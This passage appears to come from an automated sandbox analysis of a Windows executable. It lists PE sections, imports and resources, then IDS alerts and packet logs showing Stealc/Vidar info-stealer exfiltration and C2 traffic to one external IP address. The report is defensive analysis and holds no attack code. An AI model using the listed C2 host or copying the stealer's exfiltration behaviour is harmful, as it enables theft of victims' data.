                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                          .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                          .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                          .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                          .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                          .rsrc0x1000000x64f220x65000ae257c11896a4b7dbfc2f7a0ede1d3e0False0.9954628519492574data7.973137113619916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                          .reloc0x1650000xfd60x1000097ff2412c52cd6cae1a0e1d5b3ca5e1False0.5986328125data5.582035525322347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                          RT_ICON0x1001f00x616e5PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9985165770014308
                                                                                                                                                                                                                                                                                                                          RT_ICON0x1618d80x2c5dPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000968565642335
                                                                                                                                                                                                                                                                                                                          RT_ICON0x1645380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8404255319148937
                                                                                                                                                                                                                                                                                                                          RT_DIALOG0x1649a00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                                                          RT_DIALOG0x164aa00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                                                          RT_DIALOG0x164bbc0x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x164c1c0x30dataEnglishUnited States0.875
                                                                                                                                                                                                                                                                                                                          RT_MANIFEST0x164c4c0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                                                                          KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                                                          USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                                                          SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                                                          ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:43.902166+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549851195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:45.079946+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549860195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:45.899918+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.549860195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:46.576648+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549869195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:47.906794+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549880195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:48.602342+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1195.201.141.106443192.168.2.549880TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:49.276293+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549890195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:49.941821+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.549890195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:49.942460+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11195.201.141.106443192.168.2.549890TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:51.730323+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549902195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:51.742293+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549901195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:22:59.824701+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549969195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:00.910589+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549978195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:01.952740+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549988195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:03.498656+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549995195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:04.313417+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550004195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:10.654868+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550043195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:11.873153+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550051195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:12.885715+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550063195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:13.937567+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550074195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:16.216233+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550105195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:17.295384+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550113195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:19.402979+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550115195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:20.736794+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550117195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:22.063974+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550120195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:23.438444+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550124195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:27.518206+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550134195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:29.315486+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550137195.201.141.106443TCP
                                                                                                                                                                                                                                                                                                                          2025-01-12T17:23:30.674100+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550142195.201.141.106443TCP

                                                                                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.000183105 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.000205040 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.000298023 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.022856951 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.022867918 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.902081966 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.902165890 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.951750040 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.951770067 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.952780962 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.952858925 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.954925060 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:43.995320082 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.421252966 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.421323061 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.421336889 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.421374083 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.421410084 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.421729088 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.424593925 CET49851443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.424608946 CET44349851195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.429059029 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.429070950 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.429124117 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.429364920 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.429374933 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.720482111 CET4970380192.168.2.5192.229.211.108
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.725517035 CET8049703192.229.211.108192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:44.725600958 CET4970380192.168.2.5192.229.211.108
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.079886913 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.079946041 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.080327988 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.080332994 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.082096100 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.082099915 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.899998903 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.900105000 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.900120020 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.900161028 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.900211096 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.900253057 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.900316000 CET49860443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.900326014 CET44349860195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.901807070 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.901880026 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.901992083 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.902184010 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:45.902218103 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.576544046 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.576647997 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.577111006 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.577136993 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.578824043 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.578838110 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246037960 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246092081 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246223927 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246247053 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246350050 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246768951 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246802092 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248225927 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248264074 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248452902 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248817921 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248832941 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.906697989 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.906794071 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.907213926 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.907222986 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.909181118 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.909188032 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602118015 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602149963 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602226973 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602233887 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602264881 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602313042 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.606931925 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.606949091 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608591080 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608638048 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608733892 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608916998 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608930111 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.276230097 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.276293039 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.276851892 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.276859045 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.279675961 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.279684067 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.941886902 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.941992998 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.942019939 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.942080021 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.942106009 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.942151070 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.986936092 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.986963987 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:50.032265902 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:50.032304049 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:50.032373905 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:50.040719032 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:50.040733099 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.023474932 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.023561001 CET44349902195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.023642063 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.023855925 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.023875952 CET44349902195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.726774931 CET44349902195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.730323076 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.730693102 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.730705976 CET44349902195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.732459068 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.732471943 CET44349902195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.738986015 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.742292881 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.742573023 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.742579937 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.743948936 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.743954897 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.744019032 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:51.744029045 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.499928951 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.499999046 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.500016928 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.500056982 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.500107050 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.500154972 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.501440048 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.501450062 CET44349901195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.518259048 CET44349902195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.518340111 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.518343925 CET44349902195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.518403053 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.519505024 CET49902443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:52.519542933 CET44349902195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.690800905 CET49923443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.690886021 CET44349923142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.690918922 CET49924443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.690968037 CET49923443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.690989017 CET44349924142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.691051006 CET49924443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.691200018 CET49925443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.691262007 CET44349925142.250.185.228192.168.2.5
